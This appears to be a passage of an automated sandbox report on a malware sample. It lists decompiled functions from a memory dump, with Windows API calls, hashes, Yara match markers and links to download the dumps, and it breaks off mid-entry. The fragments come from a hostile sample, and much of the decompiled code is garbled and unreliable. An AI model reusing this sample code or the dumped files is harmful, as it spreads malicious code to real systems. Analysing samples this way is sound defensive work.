                                Download Yara Rule
                                C-Code - Quality: 24%
                                			E0041A066(void* __ebx, void* __eflags, intOrPtr _a8, int _a12, long _a16, void* _a20) {
				intOrPtr _v117;
				char _t19;
				void* _t28;
				void* _t29;

				asm("enter 0x6ff0, 0xfe");
				_pop(_t33);
				if(__eflags != 0) {
					_t9 = _t29 + 0x6a;
					 *_t9 =  *((intOrPtr*)(_t29 + 0x6a)) + __ebx;
					__eflags =  *_t9;
					_push(0);
					_push(_t13 + 0xc7c);
					E0041A960(_t28);
					ExitProcess(_a12);
				}
				_v117 = _v117 + __ebx;
				_t16 = _a8;
				_push(_t29);
				_t5 = _t16 + 0xc74; // 0xc74
				E0041A960(_t28, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t19 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t19;
			}







                                0x0041a066
                                0x0041a06a
                                0x0041a06d
                                0x0041a0bb
                                0x0041a0bb
                                0x0041a0bb
                                0x0041a0be
                                0x0041a0c8
                                0x0041a0ca
                                0x0041a0d8
                                0x0041a0d8
                                0x0041a06f
                                0x0041a073
                                0x0041a079
                                0x0041a07f
                                0x0041a087
                                0x0041a09d
                                0x0041a0a1

                                APIs
                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitFreeHeapProcess
                                • String ID:
                                • API String ID: 1180424539-0
                                • Opcode ID: 95c219e14b7a2123644f0a02679c23a315b4ada85e4e6cadc7b0675a67c9ec7d
                                • Instruction ID: 03a9c52b3d6c646ea41b56b40d2669e9b0209180d2facd98efced65e8deb33d2
                                • Opcode Fuzzy Hash: 95c219e14b7a2123644f0a02679c23a315b4ada85e4e6cadc7b0675a67c9ec7d
                                • Instruction Fuzzy Hash: 8BF0AFB56042047BC720EF65CC85ED77BA89F84310F15855AF9496B242C630E9148AA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 58threadwindowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 61%
                                			E004082E8(void* __eax, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t22;
				int _t27;
				void* _t30;
				void* _t32;
				void* _t37;

				asm("o16 int3");
				asm("sti");
				asm("aas");
				_t37 = __eax - 0x55743da0;
				_t30 = _t32;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t14 = E0040ACD0(_t37, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t27 = _t15;
				if(_t27 != 0) {
					_t22 = _a8;
					_t15 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t39 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t27(_t22, 0x8003, _t30 + (E0040A460(_t39, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                0x004082e8
                                0x004082ea
                                0x004082eb
                                0x004082ec
                                0x004082f1
                                0x004082ff
                                0x00408303
                                0x0040830e
                                0x0040831e
                                0x0040832e
                                0x00408333
                                0x0040833a
                                0x0040833d
                                0x0040834a
                                0x0040834c
                                0x0040834e
                                0x0040836b
                                0x0040836b
                                0x0040836d
                                0x00408372

                                APIs
                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID:
                                • API String ID: 1836367815-0
                                • Opcode ID: fe1817f8d2a4d75555eb946f5d904899bc82c527da7110fe87ecfd5fcaf17197
                                • Instruction ID: 570143a64db4bd272f87036ae43dc6f1dbe486a344872f57eeaf6ccab9883068
                                • Opcode Fuzzy Hash: fe1817f8d2a4d75555eb946f5d904899bc82c527da7110fe87ecfd5fcaf17197
                                • Instruction Fuzzy Hash: B301D831A8032877E720A6A59D43FFE762CAB40F55F04411DFF04BA1C1D6A9691646EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				E0041C400( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                0x004082f0
                                0x004082ff
                                0x00408303
                                0x0040830e
                                0x0040831e
                                0x0040832e
                                0x00408333
                                0x0040833a
                                0x0040833d
                                0x0040834a
                                0x0040834c
                                0x0040834e
                                0x0040836b
                                0x0040836b
                                0x00000000
                                0x0040836d
                                0x00408372

                                APIs
                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID:
                                • API String ID: 1836367815-0
                                • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A241, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E0041A241(WCHAR* __eax, void* __ebx, WCHAR* __ecx, void* __edi, void* _a1, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr* __esi;
				void* __ebp;
				int _t11;

				 *__ecx = __bh;
				if(__eflags >= 0) {
					asm("adc [ebx-0x3b7cf3b3], cl");
					asm("adc al, 0x52");
					_t11 = LookupPrivilegeValueW(__ecx, __eax, ??); // executed
					return _t11;
				} else {
					__al = __al + 0xbb;
					__eflags =  *(__ecx + __edi * 4 - 0x741374ab) & __cl;
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0xc));
					__esi = __eax + 0x978;
					__eax = E0041A9D0(__edx, __eax, __esi,  *((intOrPtr*)(__eax + 0xc)), 2);
					__edx = _a4;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a4, __ebp, 0x24f359a3);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}







                                0x0041a242
                                0x0041a244
                                0x0041a1f4
                                0x0041a1fa
                                0x0041a200
                                0x0041a204
                                0x0041a246
                                0x0041a24b
                                0x0041a24d
                                0x0041a251
                                0x0041a253
                                0x0041a256
                                0x0041a25d
                                0x0041a265
                                0x0041a26a
                                0x0041a26d
                                0x0041a273
                                0x0041a275
                                0x0041a276
                                0x0041a277
                                0x0041a277

                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                • Instruction ID: 9dd89fefb67c748a01c5d95d8a62272fe27cb65a082a3cf406375c290d73bb1c
                                • Opcode Fuzzy Hash: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                • Instruction Fuzzy Hash: D3F0E57410A2D46BE322EB7498C04E6BF94DE821383284ADFDCE84B107C626959F8B52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A0A2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                Download Yara Rule
                                APIs
                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: c31de795ea200c1225d078e98873855cc87943d43a23b27787b39d3d2b6300bf
                                • Instruction ID: d23a8a11c6d010ecddde116751eb4c1d8eb62083a8aedf19dd3b45afcbf351f3
                                • Opcode Fuzzy Hash: c31de795ea200c1225d078e98873855cc87943d43a23b27787b39d3d2b6300bf
                                • Instruction Fuzzy Hash: 78E092726053146BD7209FA49C89FD33BA8DF48760F018166FA5C6B642D635ED1086E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                0x0041a07f
                                0x0041a087
                                0x0041a09d
                                0x0041a0a1

                                APIs
                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                0x0041a047
                                0x0041a05d
                                0x0041a061

                                APIs
                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                C-Code - Quality: 54%
                                			E0041A1D0(intOrPtr _a4, WCHAR* _a12, void* _a16) {
				void* _v3;
				WCHAR* _t8;
				int _t9;
				WCHAR* _t10;
				void* _t13;

				_t6 = _a4;
				_t10 =  *(_a4 + 0xa18);
				E0041A960(_t13, _a4, _t6 + 0xc8c, _t10, 0, 0x46);
				_t8 = _a12;
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_t9 = LookupPrivilegeValueW(_t10, _t8, ??); // executed
				return _t9;
			}








                                0x0041a1d3
                                0x0041a1d6
                                0x0041a1ea
                                0x0041a1f2
                                0x0041a1f4
                                0x0041a1fa
                                0x0041a200
                                0x0041a204

                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8
                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID:
                                • API String ID: 621844428-0
                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00A20080, Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID: [Pj
                                • API String ID: 0-2289356113
                                • Opcode ID: 84052d957230784000e7e6282e0362ba87dbff478071a34685e05022b903d24c
                                • Instruction ID: 6a4a38389404c728a2121fcd1fe3f9214fa087570290a3b1f3e1d04c89b81d07
                                • Opcode Fuzzy Hash: 84052d957230784000e7e6282e0362ba87dbff478071a34685e05022b903d24c
                                • Instruction Fuzzy Hash: FBF0F031208304BBEB22DB28DD85F2E7BA9FF85704F10C828F9452A093D732C821E721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A426F8, Relevance: .0, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                • Instruction ID: 70838a76ed560a71469a95b6b3e5a411464ce7e5b6ce94d8d206cefd5d87ac79
                                • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                • Instruction Fuzzy Hash: 50F0AF397245599BDB48EB189955B7A73A5EBD4300FA8C039B949C7342E6259D408390
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A200EA, Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40160ed281240633b0ed370b2655bd1a73c251a083da9fde57afad4c72f6ba7c
                                • Instruction ID: 13d76d75d82cce5bffe668ff0b51ef1830176f40bd2b8ef5702e0abb962b2aed
                                • Opcode Fuzzy Hash: 40160ed281240633b0ed370b2655bd1a73c251a083da9fde57afad4c72f6ba7c
                                • Instruction Fuzzy Hash: C4E0E5B2548AA19FD311DF18AA01F1AB2F4FB88B10F15493AF40997A51D7689A058952
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E451, Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E0040E451(void* __eax, void* __ecx) {

				asm("das");
				return __eax;
			}



                                0x0040e454
                                0x0040e460

                                Memory Dump Source
                                • Source File: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e9c0566f31717829e82057a326c3f4f627a4828fc8ec2e11b7a2bdb058ecb30
                                • Instruction ID: c50915332b2b4cc7bd1d530fc76975f121dfbb6d707ed8f852dde9e44b139cde
                                • Opcode Fuzzy Hash: 0e9c0566f31717829e82057a326c3f4f627a4828fc8ec2e11b7a2bdb058ecb30
                                • Instruction Fuzzy Hash: 24B09902B8082802A0280C8AB802AB2E3A8C3832B3E0032ABAE08A30000083802A00A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A30060, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A301D4, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A3010C, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A307AC, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A30C40, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A310D0, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A31148, Relevance: .0, Instructions: 6COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
